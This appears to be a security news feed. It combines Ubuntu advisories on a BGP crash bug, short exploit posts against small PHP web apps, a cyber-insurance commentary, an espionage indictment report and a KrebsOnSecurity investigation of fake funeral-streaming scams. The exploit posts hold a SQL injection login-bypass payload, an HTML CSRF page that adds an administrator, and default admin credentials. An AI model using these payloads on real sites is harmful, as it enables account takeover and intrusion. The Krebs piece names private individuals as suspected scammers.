Ubuntu Security Notice 7017-1 - Iggy Frankovic discovered that Quagga incorrectly handled certain BGP messages. A remote attacker could possibly use this issue to cause Quagga to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7017-1September 17, 2024quagga vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Quagga could be made to crash if it received specially crafted networktraffic.Software Description:- quagga: BGP/OSPF/RIP routing daemonDetails:Iggy Frankovic discovered that Quagga incorrectly handled certain BGPmessages. A remote attacker could possibly use this issue to cause Quaggato crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS   quagga                          1.2.4-4ubuntu0.5   quagga-bgpd                     1.2.4-4ubuntu0.5In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-7017-1   CVE-2024-44070Package Information:   https://launchpad.net/ubuntu/+source/quagga/1.2.4-4ubuntu0.5

Ubuntu Security Notice USN-7017-1

Ubuntu Security Notice 7016-1 - Iggy Frankovic discovered that FRR incorrectly handled certain BGP messages. A remote attacker could possibly use this issue to cause FRR to crash, resulting in a denial of service.

    ==========================================================================Ubuntu Security Notice USN-7016-1September 17, 2024frr vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTS- Ubuntu 22.04 LTSSummary:FRR could be made to crash if it received specially crafted networktraffic.Software Description:- frr: FRRouting suite of internet protocolsDetails:Iggy Frankovic discovered that FRR incorrectly handled certain BGPmessages. A remote attacker could possibly use this issue to cause FRR tocrash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS   frr                             8.4.4-1.1ubuntu6.2Ubuntu 22.04 LTS   frr                             8.1-1ubuntu1.11In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-7016-1   CVE-2024-44070Package Information:   https://launchpad.net/ubuntu/+source/frr/8.4.4-1.1ubuntu6.2   https://launchpad.net/ubuntu/+source/frr/8.1-1ubuntu1.11

Ubuntu Security Notice USN-7016-1

Membership Management System version 1.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Membership Management System 1.1 Auth By Pass Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://codeastro.com/membership-management-system-in-php-with-source-code/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##[+] http://127.0.0.1/Membership/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Membership Management System 1.1 SQL Injection

HYSCALE System version 1.9 suffers from add administrator and cross site request forgery vulnerabilities.

=============================================================================================================================================  
| # Title     : HYSCALE System v1.9 CSRF add admin Vulnerability                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This HTML page is designed to remotely add new admin.

[+] Line 10 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Registration Form</title>  
</head>  
<body>

<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">

        <label for="username">Username:</label>  
    <input type="text" name="username" id="username" required><br><br>

    <label for="email">Email:</label>  
    <input type="email" name="email" id="email" required><br><br>

    <label for="password">Password:</label>  
    <input type="password" name="password" id="password" required><br><br>

    <label for="dob">Date of Birth:</label>  
    <input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>

    <label>Gender:</label><br>  
    <input type="radio" name="gender" value="Male" id="male" required>  
    <label for="male">Male</label><br>  
    <input type="radio" name="gender" value="Female" id="female">  
    <label for="female">Female</label><br><br>

    <label for="usertype">User Type:</label>  
    <select name="usertype" id="usertype" required>  
        <option value="admin">Admin</option>  
        <option value="user">User</option>  
        <option value="guest">Guest</option>  
    </select><br><br>

    <label for="target_sales">Target Sales:</label>  
    <input type="text" name="target_sales" id="target_sales" required><br><br>

    <input type="submit" value="Submit">

</form>

</body>  
</html>

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery

Furniture Master version 2 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Furniture master v2 Sql injection Vulnerability                                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_furniture-master-2-zip.zip      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /prodInfo.php?prodId=1 <===== inject here[+] http://127.0.0.1/furniture_master/prodInfo.php?prodId=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Furniture Master 2 SQL Injection

Food Ordering and Table Reservation System for Restaurants version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : food ordering and table reservation system for restaurants 1.0 Insecure Settings Vulnerability                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2024/202404/kashipara.com_food-ordering-and-table-re.zip  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: murja      Password: 123[+] http://127.0.0.1/food-ordering-and-table-reservation-system-for-restaurants-master/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Food Ordering And Table Reservation System For Restaurants 1.0 Insecure Settings

Beauty Parlour and Saloon Management System version 1.1 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/bpmsp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Beauty Parlour And Saloon Management System 1.1 Insecure Settings

Ultimately, the goal of businesses and cyber insurers alike is to build more resilient IT environments to avoid cyberattacks and the ransom, downtime, and reputation hit that come along with them.

Source: Olekcii Mach via Alamy Stock Photo

COMMENTARY

The rising cost of cyberattacks, including downtime, investigations, lawsuits, ransoms, and more are prompting cyber insurers to re-examine underwriting and encourage greater cyber resiliency in their customer bases. With the influx of cyber-insurance claims stemming from the CrowdStrike IT outage and the exorbitant price of recovering from data breaches — $4.88 million, on average, according to IBM — the cyber-insurance industry will continue to self-correct and evolve to fit market needs while maintaining profitability.

Insurers will come away from July's widespread IT outage relatively unscathed, as the outages were caused by a vendor error, not a cyberattack, and because it was fixed fairly quickly. Still, insurer Parametrix estimates insured losses from US Fortune 500 companies will total $540 million to $1.08 billion, not even including Microsoft. Now, imagine this is a cyberattack that goes through a third-party software-as-a-service (SaaS) provider and takes down a similar swath of business, but recovery is slower, and companies must pay ransoms to recoup their data. How many billions of dollars will cyber insurers be out then? 

Because cybersecurity is still a relatively new corner of the insurance market, ambiguity remains around what should be covered, the role cyber insurance plays in potentially encouraging ransom payments, etc. There's no doubt that it's still finding its footing, figuring out in real-time and on a world stage how to insure companies against rapidly changing and advancing cybersecurity threats.

This evolution will be what finally causes businesses to face reality and prioritize cyber resiliency to ensure data is always recoverable in the event their primary network is taken offline or data is held for ransom. Companies may not take it upon themselves to invest in better data protection practices, and the cyber-insurance market ultimately will force their hand.

**Cyber Insurers Drag Us Into the Future**

Over the past five years, the rise of ransomware has shifted not only an organization's risk profile but also the estimated payouts. In many insurance policies, it's all about risk mitigation, but unless an underwriter can accurately assess the risk or implement requirements to mitigate the threat, it becomes a financial business risk for the insurance company. Therefore, cyber-insurance prices have significantly risen along with the bar to qualify for coverage.

Many of the new requirements focus on data storage and backups. Segmented, encrypted, and immutable backups are the industry standard, but because of limited resources, unawareness, or segmented cybersecurity teams, it hasn't always been a prioritized industry standard. Now, companies will have no choice but to up their game if they want coverage. Those who fail to adopt these requirements will be left without insurance or an effective recovery plan, unable to financially recover when the inevitable ransomware attack hits.

However, in June, businesses stood before the House Homeland Security Committee and told Congress that they are struggling to obtain cyber insurance, and even once insurance is secured, they struggle to understand the nuances of what's covered. Plus, ransom payments themselves are increasing as cybercriminals learn they can demand, and receive, large payouts. According to Chainalysis, the median ransom payment in 2024 was $1.5 million as of July, a huge increase from $200,000 in early 2023.

Because such a significant portion of companies are uncertain what is actually covered by their cyber insurance — around 40%, according to Sophos — they can't risk having to pay the whole ransom themselves or face never recovering their valuable data. Companies must do what they can to reduce their own risk.

**Recoverable Data Is Its Own Form of Cyber Insurance**

Companies can reduce the cost of attacks by ensuring data remains recoverable, mitigating operational downtime, and preventing the need to pay ransoms. Ransomware relies on the fact that production or backup data is made useless for organizations to recover following an attack, but with immutable backup in place, organizations ensure access to their data remains. This is especially true as ransomware is now targeting backups specifically.

Immutability is a must-have for any type of backup storage because it is time-based, not key-based like encryption. This means that there is truly no way (outside of destruction of the physical hardware) to alter or remove the backup data once it is written into a device that has object lock, i.e., immutability, enabled. You can truly maximize this strategy by encrypting backup data before writing it to immutable storage; that way, it's unreadable (unless you have the key) and unalterable. 

It's also important to ensure that a disaster recovery plan is in place that includes a multilevel backup solution and disaster recovery testing on a weekly and monthly basis to get ahead of any potential issues. Once these are implemented, keep copies of all the backup tests to prove to an insurance company that you have a lower risk factor. 

Ultimately, the goal of businesses and cyber insurers alike is to build more-resilient IT environments to avoid cyberattacks and the ransom, downtime, and reputation hit that come along with them. Law enforcement will continue to fight cybercrime, but there's no indication it will let up. Changes in the cyber-insurance market have the potential to disrupt the threat landscape by prompting the ubiquitous adoption of backup best practices and cyber resiliency.

**About the Author**

CEO, Object First

Object First CEO, David Bennett is a tech veteran and a seasoned channel executive with more than 30 years of IT channel leadership. Before joining Object First, he was CEO of Axcient and chief revenue officer at Webroot. Bennett has also held international leadership roles within such companies as Lenovo, Sony, and Kingston. British-born, he now resides in Colorado with his wife and family.

How Shifts in Cyber Insurance Are Affecting the Security Landscape

A Chinese national has been indicted in the U.S. on charges of conducting a "multi-year" spear-phishing campaign to obtain unauthorized access to computer software and source code created by the National Aeronautics and Space Administration (NASA), research universities, and private companies.
Song Wu, 39, has been charged with 14 counts of wire fraud and 14 counts of aggravated identity theft.

A Chinese national has been indicted in the U.S. on charges of conducting a "multi-year" spear-phishing campaign to obtain unauthorized access to computer software and source code created by the National Aeronautics and Space Administration (NASA), research universities, and private companies.

Song Wu, 39, has been charged with 14 counts of wire fraud and 14 counts of aggravated identity theft. If convicted, he faces a maximum sentence of a jail term of 20 years for each count of wire fraud and a two-year consecutive sentence in prison for aggravated identity theft.

He was employed as an engineer at the Aviation Industry Corporation of China (AVIC), a Chinese state-owned aerospace and defense conglomerate founded in 2008 and headquartered in Beijing.

According to information listed on AVIC's website, it has "over 100 subsidiaries, nearly 24 listed companies, and more than 400,000 employees." In November 2020 and June 2021, the company and some of its subsidiaries became the subject of U.S. sanctions, barring Americans from investing in the company.

Song is said to have carried out a spear-phishing campaign that involved creating email accounts to mimic U.S.-based researchers and engineers, which were then utilized to obtain specialized restricted or proprietary software for aerospace engineering and computational fluid dynamics.

The software could also be used for industrial and military applications, including the development of advanced tactical missiles and aerodynamic design and assessment of weapons.

These emails, the U.S. Department of Justice (DoJ) alleged, were sent to employees at NASA, the U.S. Air Force, Navy, and Army, and the Federal Aviation Administration, as well as individuals employed in major research universities in Georgia, Michigan, Massachusetts, Pennsylvania, Indiana, and Ohio.

The social engineering attempts, which started around January 2017 and continued through December 2021, also targeted private sector companies that work in the aerospace field.

The fraudulent messages purported to be sent by a colleague, associate, friend, or other people in the research or engineering community, requesting prospective targets to send or make available source code or software that they had access to. The DoJ did not disclose the name of the software or the defendant's current whereabouts.

"Once again, the FBI and our partners have demonstrated that cyber criminals around the world who are seeking to steal our companies' most sensitive and valuable information can and will be exposed and held accountable," said Keri Farley, Special Agent in Charge of FBI Atlanta.

"As this indictment shows, the FBI is committed to pursuing the arrest and prosecution of anyone who engages in illegal and deceptive practices to steal protected information."

Coinciding with the indictment, the DoJ also unsealed a separate indictment against Chinese national Jia Wei, a member of the People's Liberation Army (PLA), for infiltrating an unnamed U.S.-based communications company in March 2017 to steal proprietary information relating to civilian and military communication devices, product development, and testing plans.

"During his unauthorized access, Wei and his co-conspirators attempted to install malicious software designed to provide persistent unauthorized access to the U.S. company's network," the DoJ said. "Wei's unauthorized access continued until approximately late May 2017."

The development comes weeks after the U.K. National Crime Agency (NCA) announced that three men, Callum Picari, 22; Vijayasidhurshan Vijayanathan, 21; and Aza Siddeeque, 19, pleaded guilty to running a website that enabled cybercriminals to bypass banks' anti-fraud checks and take control of bank accounts.

The service, named OTP.agency, allowed monthly subscribers to socially engineer bank account holders into disclosing genuine one-time-passcodes, or reveal their personal information.

The underground service is said to have targeted over 12,500 members of the public between September 2019 and March 2021, when it was taken offline after the trio were arrested. It's currently not known how much illegal revenue the operation generated during its lifespan.

"A basic package costing £30 a week allowed multi-factor authentication to be bypassed on platforms such as HSBC, Monzo, and Lloyds so that criminals could complete fraudulent online transactions," the NCA said. "An elite plan cost £380 a week and granted access to Visa and Mastercard verification sites."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Chinese Engineer Charged in U.S. for Years-Long Cyber Espionage Targeting NASA and Military

Scammers are flooding Facebook with groups that purport to offer video streaming of funeral services for the recently deceased. Friends and family who follow the links for the streaming services are then asked to cough up their credit card information. Recently, these scammers have branched out into offering fake streaming services for nearly any kind of event advertised on Facebook. Here's a closer look at the size of this scheme, and some findings about who may be responsible.

Scammers are flooding **Facebook** with groups that purport to offer video streaming of funeral services for the recently deceased. Friends and family who follow the links for the streaming services are then asked to cough up their credit card information. Recently, these scammers have branched out into offering fake streaming services for nearly any kind of event advertised on Facebook. Here’s a closer look at the size of this scheme, and some findings about who may be responsible.

One of the many scam funeral group pages on Facebook. Clicking to view the “live stream” of the funeral takes one to a newly registered website that requests credit card information.

KrebsOnSecurity recently heard from a reader named George who said a friend had just passed away, and he noticed that a Facebook group had been created in that friend’s memory. The page listed the correct time and date of the funeral service, which it claimed could be streamed over the Internet by following a link that led to a page requesting credit card information.

“After I posted about the site, a buddy of mine indicated \[the same thing\] happened to her when her friend passed away two weeks ago,” George said.

Searching Facebook/Meta for a few simple keywords like “funeral” and “stream” reveals countless funeral group pages on Facebook, some of them for services in the past and others erected for an upcoming funeral.

All of these groups include images of the deceased as their profile photo, and seek to funnel users to a handful of newly-registered video streaming websites that require a credit card payment before one can continue. Even more galling, some of these pages request donations in the name of the deceased.

It’s not clear how many Facebook users fall for this scam, but it’s worth noting that many of these fake funeral groups attract subscribers from at least some of the deceased’s followers, suggesting those users have subscribed to the groups in anticipation of the service being streamed. It’s also unclear how many people end up missing a friend or loved one’s funeral because they mistakenly thought it was being streamed online.

One of many look-alike landing pages for video streaming services linked to scam Facebook funeral groups.

George said their friend’s funeral service page on Facebook included a link to the supposed live-streamed service at **livestreamnow\[.\]xyz**, a domain registered in November 2023.

According to DomainTools.com, the organization that registered this domain is called “**apkdownloadweb**,” is based in Rajshahi, Bangladesh, and uses the DNS servers of a Web hosting company in Bangladesh called **webhostbd\[.\]net**.

A search on “apkdownloadweb” in DomainTools shows three domains registered to this entity, including **live24sports\[.\]xyz** and **onlinestreaming\[.\]xyz**. Both of those domains also used webhostbd\[.\]net for DNS. Apkdownloadweb has a Facebook page, which shows a number of “live video” teasers for sports events that have already happened, and says its domain is **apkdownloadweb\[.\]com**.

Livestreamnow\[.\]xyz is currently hosted at a Bangladeshi web hosting provider named **cloudswebserver\[.\]com**, but historical DNS records show this website also used DNS servers from webhostbd\[.\]net.

The Internet address of livestreamnow\[.\]xyz is **148.251.54.196**, at the hosting giant Hetzner in Germany. DomainTools shows this same Internet address is home to nearly 6,000 other domains (.CSV), including hundreds that reference video streaming terms, like **watchliveon24\[.\]com** and **foxsportsplus\[.\]com**.

There are thousands of domains at this IP address that include or end in the letters “**bd**,” the country code top-level domain for Bangladesh. Although many domains correspond to websites for electronics stores or blogs about IT topics, just as many contain a fair amount of placeholder content (think “lorem ipsum” text on the “contact” page). In other words, the sites appear legitimate at first glance, but upon closer inspection it is clear they are not currently used by active businesses.

The passive DNS records for 148.251.54.196 show a surprising number of results that are basically two domain names mushed together. For example, there is **watchliveon24\[.\]com.playehq4ks\[.\]com**, which displays links to multiple funeral service streaming groups on Facebook.

Another combined domain on the same Internet address — livestreaming24\[.\]xyz.allsportslivenow\[.\]com — lists dozens of links to Facebook groups for funerals, but also for virtually all types of events that are announced or posted about by Facebook users, including graduations, concerts, award ceremonies, weddings, and rodeos.

Even community events promoted by state and local police departments on Facebook are fair game for these scammers. A Facebook page maintained by the police force in Plympton, Mass. for a town social event this summer called Plympton Night Out was quickly made into two different Facebook groups that informed visitors they could stream the festivities at either **espnstreamlive\[.\]co** or **skysports\[.\]live**.

**WHO’S BEHIND THE FAKEBOOK FUNERALS?**

Recall that the registrant of livestreamnow\[.\]xyz — the bogus streaming site linked in the Facebook group for George’s late friend — was an organization called “Apkdownloadweb.” That entity’s domain — **apkdownloadweb\[.\]com** — is registered to a **Mazidul Islam** in Rajshahi, Bangladesh (this domain is also using Webhostbd\[.\]net DNS servers).

Mazidul Islam’s LinkedIn page says he is the organizer of a now defunct IT blog called gadgetsbiz\[.\]com, which DomainTools finds was registered to a **Mehedi Hasan** from Rajshahi, Bangladesh.

To bring this full circle, DomainTools finds the domain name for the DNS provider on all of the above-mentioned sites  — webhostbd\[.\]net — was originally registered to a **Md Mehedi**, and to the email address **webhostbd.net@gmail.com** (“MD” is a common abbreviation for Muhammad/Mohammod/Muhammed).

A search on that email address at Constella finds a breached record from the data broker Apollo.io saying its owner’s full name is **Mohammod Mehedi Hasan.** Unfortunately, this is not a particularly unique name in that region of the world.

But as luck would have it, sometime last year the administrator of apkdownloadweb\[.\]com managed to infect their Windows PC with password-stealing malware. We know this because the raw logs of data stolen from this administrator’s PC were indexed by the breach tracking service Constella Intelligence \[full disclosure: As of this month, Constella is an advertiser on this website\].

These so-called “stealer logs” are mostly generated by opportunistic infections from information-stealing trojans that are sold on cybercrime markets. A typical set of logs for a compromised PC will include any usernames and passwords stored in any browser on the system, as well as a list of recent URLs visited and files downloaded.

Malware purveyors will often deploy infostealer malware by bundling it with “cracked” or pirated software titles. Indeed, the stealer logs for the administrator of apkdownloadweb\[.\]com show this user’s PC became infected immediately after they downloaded a booby-trapped mobile application development toolkit.

Those stolen credentials indicate Apkdownloadweb\[.\]com is maintained by a 20-something native of Dhaka, Bangladesh named **Mohammod Abdullah Khondokar**.

The “browser history” folder from the admin of Apkdownloadweb shows Khondokar recently left a comment on the Facebook page of Mohammod Mehedi Hasan, and Khondokar’s Facebook profile says the two are friends.

Neither MD Hasan nor MD Abdullah Khondokar responded to requests for comment. KrebsOnSecurity also sought comment from Meta.

Latest News